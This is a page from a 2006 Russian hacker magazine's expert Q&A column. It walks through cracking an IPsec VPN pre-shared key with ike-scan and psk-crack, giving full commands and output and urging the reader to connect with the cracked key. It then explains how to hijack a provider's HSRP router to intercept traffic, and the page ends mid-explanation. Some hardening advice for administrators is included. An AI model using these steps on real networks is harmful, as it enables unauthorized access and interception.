Издательский дом ООО "Гейм Лэнд"СПЕЦВЫПУСК ЖУРНАЛА ХАКЕР #66, МАЙ 2006 г.

спроси эксперта

АНДРЕЙ КАРОЛИК

Спецвыпуск: Хакер, номер #066, стр. 066-084-2


Как видно по выводу утилиты, мы получили информацию об используемых типах шифрования и методах аутентификации. Теперь попытаемся вытащить данные, необходимые для взлома, подставив полученные значения.

arhontus # ike-scan -v -A --trans 1,2,1,2 --dhgroup=2 --idtype=1 -Paggressive_psk 192.168.99.9

Starting ike-scan 1.8 with 1 hosts (http://www.nta-monitor.com/ike-scan/)

--- Pass 1 of 3 completed

192.168.99.9 Aggressive Mode Handshake returned HDR=(CKY-R=6182785eabc881b0) SA=(Enc=DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=12f5f28c457168a9702d9fe274cc0100 (Cisco Unity) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection) VID=9445df43abc981b0c0566f19a44437ab VID=09002689dfd6b712 (XAUTH) KeyExchange(128 bytes) ID(Type=ID_IPV4_ADDR, Value=192.168.99.9) Nonce(20 bytes) Hash(20 bytes)

Необходимая информация записана в файле aggressive_psk. Теперь можно приступать к взлому методом перебора.

dyno tmp # time psk-crack --bruteforce=5 agr

Starting psk-crack [ike-scan 1.8] (http://www.nta-monitor.com/ike-scan/)

Running in brute-force cracking mode

Brute force with 36 chars up to length 5 will take up to 60466176 iterations

key "xakep" matches SHA1 hash 5bca530f21cf4bf68e067e11146c752e0e81c33b

Ending psk-crack: 42669898 iterations in 286.307 seconds (149035.66 iterations/sec)

Секретный ключ xakep был успешно забрутфорсен за пять минут на простеньком AMD 3200+. Теперь можешь ввести ключ в любимый IPSEC-клиент и присоединятся к серверу. Админу можно посоветовать поставить пароль посложнее, отключить поддержку agressive mode или использовать x509-сертификаты.

СПЕЦ: Недавно узнал о многоадресной рассылке и поставил внешний интерфейс своего роутера снифать 224.0.0.0/4. Увидел, что какие-то странные HSRP-пакеты постоянно идут на адрес 224.0.0.2. Что за пакеты, могу ли я похачить провайдера?

Константин Гавриленко: Видимо, твой провайдер использует протокол резервной маршрутизации для обеспечения высокого уровня доступности сети и бесперебойного выхода в интернет. HSRP создает группу из резервных маршрутизаторов и главного маршрутизатора, который обслуживает все пакеты, посланные на виртуальный адрес. При выходе из строя главного маршрутизатора один из запасных маршрутизаторов займет его место автоматически и унаследует виртуальный адрес маршрутизатора, обеспечивая таким образом бесперебойную работу сети. HSRP-протокол запатентован Cisco и, соответственно, поддерживается только их оборудованием. Существует альтернативный открытый протокол VRRP (rfc2338), его поддерживают и используют другие производители, он также обеспечивает лучшую аутентификацию пакетов.

Использовать HSRP в сетях, где нет доверия к пользователям, не стоит, даже при включенной аутентификации. На самом деле назвать аутентификацией текстовый пароль, передающийся в пакете HSRP, можно, опять же, только с большой натяжкой. При получении доступа в сеть, где используется HSRP, можно легко стать основным маршрутизатором и перехватить весь проходящий трафик. Вся информация, необходимая для захвата виртуального адреса, содержится в транслируемом пакете. Запускаешь tethereal и ловишь пакет...

Назад на стр. 066-084-1  Содержание  Вперед на стр. 066-084-3